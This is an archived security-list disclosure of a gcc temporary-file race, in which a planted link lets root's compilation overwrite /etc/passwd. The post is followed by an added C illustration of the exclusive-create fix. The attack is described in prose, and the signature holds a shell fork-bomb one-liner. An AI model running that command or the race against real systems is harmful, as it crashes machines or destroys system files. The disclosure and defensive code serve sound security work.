During compilation, gcc uses the following temporary files:

/tmp/ccXXXXXX.i
/tmp/ccXXXXXX.s
/tmp/ccXXXXXX.o

Where XXXXXX means a 'unique' random number. Unique, but not quite. Only the first file (.i) is created properly, after detailed checks. But the next one (.s) is created within a noticeable time interval using _exactly the same_ number and without performing any checks (!). Finally, the last file (.o) is created again in the same way, but '1' is appended to the sequence number.

Now, we may leave a script which periodically checks /tmp looking for cc*.i files. If any has been found, the script immediately creates a link to /etc/passwd (or another vital file) using the sequence number stripped from the .i file. Because no checks are performed by gcc, if our script was fast enough, the target file may be overwritten when gcc has been launched by root! That's especially possible when large sources (more than 20-50 kB?) are compiled.

I attached a simple and slow exploit. It works, but should become even more effective when you rewrite it to C... I've tested it under gcc 2.7.3.f.1

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP = [lcamtufat_private] =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;.
_ ] = ---------=

[attachment: gcc-exploit]
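The bug the post describes is reuse of a predicted temp name with a plain create-and-truncate open; the fix on the compiler side is to create every temp file exclusively so a pre-planted link at that path makes the open fail instead of being written through. The following C code is an added illustration of that check, not part of the original post or of gcc; `sibling_name`, `create_exclusive`, `check_temp_path` and `demo` are hypothetical names, and the planted file in `demo` is a constructed stand-in for the link the post talks about.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: derive the sibling temp name the way the post
 * describes (same random part, different suffix), e.g.
 * "/tmp/ccAbC123.i" -> "/tmp/ccAbC123.s" or "/tmp/ccAbC1231.o". */
int sibling_name(const char *base, const char *suffix, char *out, size_t outlen) {
    const char *dot = strrchr(base, '.');
    if (!dot || (size_t)(dot - base) + strlen(suffix) + 1 > outlen) return -1;
    memcpy(out, base, dot - base);
    strcpy(out + (dot - base), suffix);
    return 0;
}

/* Exclusive creation: O_CREAT|O_EXCL fails with EEXIST if anything (file,
 * hard link or symlink) already sits at the path, and O_NOFOLLOW refuses a
 * symlink as the final component. The unsafe pattern from the post is the
 * same open() with O_CREAT|O_TRUNC and no O_EXCL on a reused name. */
int create_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* 1 = something was already planted at path (refused, nothing clobbered),
 * 0 = file created fresh (then removed again), -1 = other error. */
int check_temp_path(const char *path) {
    int fd = create_exclusive(path);
    if (fd >= 0) { close(fd); unlink(path); return 0; }
    return errno == EEXIST ? 1 : -1;
}

/* Constructed scenario in a private directory: plant a file at the predicted
 * ".s" name, then show the exclusive create refuses it while the fresh "1.o"
 * name succeeds. Returns 1 if both outcomes are as expected. */
int demo(void) {
    char dir[] = "/tmp/gccraceXXXXXX";
    char base[256], planted[256], fresh[256];
    if (!mkdtemp(dir)) return 0;
    snprintf(base, sizeof base, "%s/ccAbC123.i", dir);
    if (sibling_name(base, ".s", planted, sizeof planted) < 0) return 0;
    if (sibling_name(base, "1.o", fresh, sizeof fresh) < 0) return 0;
    int fd = open(planted, O_WRONLY | O_CREAT, 0600);  /* the planted entry */
    if (fd < 0) return 0;
    close(fd);
    int refused = check_temp_path(planted);   /* expected 1 */
    int created = check_temp_path(fresh);     /* expected 0 */
    unlink(planted);
    rmdir(dir);
    return refused == 1 && created == 0;
}
```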
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:35 PDT